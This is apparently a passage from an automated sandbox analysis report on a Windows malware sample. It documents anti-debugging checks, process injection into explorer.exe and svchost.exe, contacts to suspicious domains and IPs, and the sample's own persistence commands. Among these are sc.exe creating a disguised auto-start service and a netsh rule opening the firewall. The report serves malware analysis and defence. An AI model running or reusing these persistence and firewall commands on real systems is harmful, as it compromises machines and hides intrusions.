                          Source: explorer.exe, 00000005.00000000.383962963.00000000083E0000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
                          Source: explorer.exe, 00000005.00000000.384369308.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                          Source: svchost.exe, 00000028.00000002.703980995.000001D6DA264000.00000004.00000001.sdmp | Binary or memory string: "@Hyper-V RAW
                          Source: explorer.exe, 00000005.00000000.395241022.0000000006410000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: explorer.exe, 00000005.00000000.383962963.00000000083E0000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
                          Source: explorer.exe, 00000005.00000000.395241022.0000000006410000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: WerFault.exe, 00000012.00000002.519792531.0000000004AC0000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.527735406.0000023921EE2000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.527807876.0000023921EED000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.646394149.000001D6D4A29000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.702306270.000001D6DA257000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
                          Source: explorer.exe, 00000005.00000000.396996323.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
                          Source: svchost.exe, 0000001C.00000002.527535638.0000023921EA7000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW0{
                          Source: explorer.exe, 00000005.00000000.405272364.00000000045BE000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: explorer.exe, 00000005.00000000.396996323.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                          Source: explorer.exe, 00000005.00000000.384369308.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
                          Source: explorer.exe, 00000005.00000000.403574937.000000000095C000.00000004.00000020.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Process information queried: ProcessInformation
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Code function: 19_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: 17_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: 17_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: 17_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: 17_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: 17_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: 17_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: 17_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | System information queried: ModuleInformation

                          Anti Debugging:

                          Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | System information queried: CodeIntegrityInformation
                          Source: C:\Users\user\AppData\Roaming\ujhcrda | System information queried: CodeIntegrityInformation
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_0040A7EE LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_00450083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_00460042 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Roaming\ujhcrda | Code function: 12_2_00520083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Roaming\ujhcrda | Code function: 12_2_00530042 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exe | Code function: 14_2_02070083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exe | Code function: 14_2_0208092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exe | Code function: 14_2_02080D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: 17_2_00401000 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: 17_2_0040C180 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Code function: 19_2_00530083 push dword ptr fs:[00000030h]
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | Code function: 36_2_0067092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | Code function: 36_2_00670D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Roaming\ujhcrda | Process queried: DebugPort
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_004038EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: 17_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_0040FA70 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Process token adjusted: Debug
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_1_004027ED LdrLoadDll,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Memory protected: page guard
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_00408C53 SetUnhandledExceptionFilter,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_004038EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_00403CF4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_0040771C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exe | Code function: 14_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Code function: 19_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | Code function: 36_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 39_2_00A59A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          HIPS / PFW / Operating System Protection Evasion:

                          barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\svchost.exe | Domain query: patmushta.info
Source: C:\Windows\explorer.exe | Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe | Network Connect: 188.166.28.199 80
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 104.47.54.36 25
Source: C:\Windows\explorer.exe | Domain query: unicupload.top
Source: C:\Windows\explorer.exe | Network Connect: 185.233.81.115 187
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 8.209.67.104 443
Source: C:\Windows\explorer.exe | Network Connect: 185.7.214.171 144
Source: C:\Windows\explorer.exe | Domain query: host-data-coin-11.com
Source: C:\Windows\SysWOW64\svchost.exe | Domain query: microsoft-com.mail.protection.outlook.com
Source: C:\Windows\explorer.exe | Domain query: goo.su
Source: C:\Windows\explorer.exe | Domain query: transfer.sh
Source: C:\Windows\explorer.exe | Domain query: a0621298.xsph.ru
Source: C:\Windows\explorer.exe | Network Connect: 185.186.142.166 80
Source: C:\Windows\explorer.exe | Domain query: data-host-coin-8.com
Benign windows process drops PE files
Source: C:\Windows\explorer.exe | File created: 8008.exe.5.dr
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\ujhcrda | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\ujhcrda | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | Memory allocated: C:\Windows\SysWOW64\svchost.exe base: A50000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Memory written: C:\Users\user\Desktop\0Cjy7Lkv1A.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\ujhcrda | Memory written: C:\Users\user\AppData\Roaming\ujhcrda base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Memory written: C:\Users\user\AppData\Local\Temp\B3BA.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: A50000 value starts with: 4D5A
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_00460110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Thread created: C:\Windows\explorer.exe EIP: 4151930
Source: C:\Users\user\AppData\Roaming\ujhcrda | Thread created: unknown EIP: 61E1930
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: A50000
Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 8A8008
.NET source code references suspicious native API functions
Source: B3BA.exe.5.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: B3BA.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 20.0.B3BA.exe.370000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 20.0.B3BA.exe.370000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 20.0.B3BA.exe.370000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 20.0.B3BA.exe.370000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 20.0.B3BA.exe.370000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 20.0.B3BA.exe.370000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 20.2.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 20.2.B3BA.exe.370000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 20.0.B3BA.exe.370000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 20.0.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 41.2.B3BA.exe.250000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 41.2.B3BA.exe.250000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 41.0.B3BA.exe.250000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 41.0.B3BA.exe.250000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 41.0.B3BA.exe.250000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 41.0.B3BA.exe.250000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 41.0.B3BA.exe.250000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 41.0.B3BA.exe.250000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 41.0.B3BA.exe.250000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 41.0.B3BA.exe.250000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Process created: C:\Users\user\Desktop\0Cjy7Lkv1A.exe "C:\Users\user\Desktop\0Cjy7Lkv1A.exe"
Source: C:\Users\user\AppData\Roaming\ujhcrda | Process created: C:\Users\user\AppData\Roaming\ujhcrda C:\Users\user\AppData\Roaming\ujhcrda
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6188 -ip 6188
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 520
Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uuqefjyt\
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\szdcdkt.exe" C:\Windows\SysWOW64\uuqefjyt\
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create uuqefjyt binPath= "C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d\"C:\Users\user\AppData\Local\Temp\A8FB.exe\"" type= own start= auto DisplayName= "wifi support
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description uuqefjyt "wifi internet conection
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start uuqefjyt
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Process created: C:\Users\user\AppData\Local\Temp\B3BA.exe C:\Users\user\AppData\Local\Temp\B3BA.exe
Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Code function: 19_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Code function: 19_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
Source: explorer.exe, 00000005.00000000.412037085.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.375793677.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.392044166.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.373865649.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.397393127.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.403823845.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.383962963.00000000083E0000.00000004.00000001.sdmp, 60C2.exe, 0000000E.00000000.465437967.0000000000C60000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.468590395.0000000000C60000.00000002.00020000.sdmp, B3BA.exe, 0000002A.00000002.633666002.00000000017A0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.373535922.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.392044166.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.373865649.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.403473137.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.391702233.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.403823845.0000000000EE0000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.465437967.0000000000C60000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.468590395.0000000000C60000.00000002.00020000.sdmp, B3BA.exe, 0000002A.00000002.633666002.00000000017A0000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.392044166.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.373865649.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.403823845.0000000000EE0000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.465437967.0000000000C60000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.468590395.0000000000C60000.00000002.00020000.sdmp, B3BA.exe, 0000002A.00000002.633666002.00000000017A0000.00000002.00020000.sdmp | Binary or memory string: &Program Manager
Source: explorer.exe, 00000005.00000000.392044166.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.373865649.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.403823845.0000000000EE0000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.465437967.0000000000C60000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.468590395.0000000000C60000.00000002.00020000.sdmp, B3BA.exe, 0000002A.00000002.633666002.00000000017A0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: __EH_prolog,OpenJobObjectA,GetLocaleInfoA,_ftell,_fseek,_printf,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: __EH_prolog,CompareFileTime,EnumSystemLocalesW,GetConsoleAliasesA,FindResourceExW,GetVersionExA,VirtualQuery,CreateThread,SetComputerNameExA,_printf,_malloc,_calloc,__wfopen_s,_fseek,__floor_pentium4,_puts,GetConsoleAliasA,GetModuleHandleA,GlobalAlloc,GetConsoleTitleA,GetConsoleTitleA,GetConsoleTitleA,GetAtomNameW,CreateIoCompletionPort,GetFileAttributesW,GetDefaultCommConfigW,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\60C2.exe | Code function: GetLocaleInfoA,
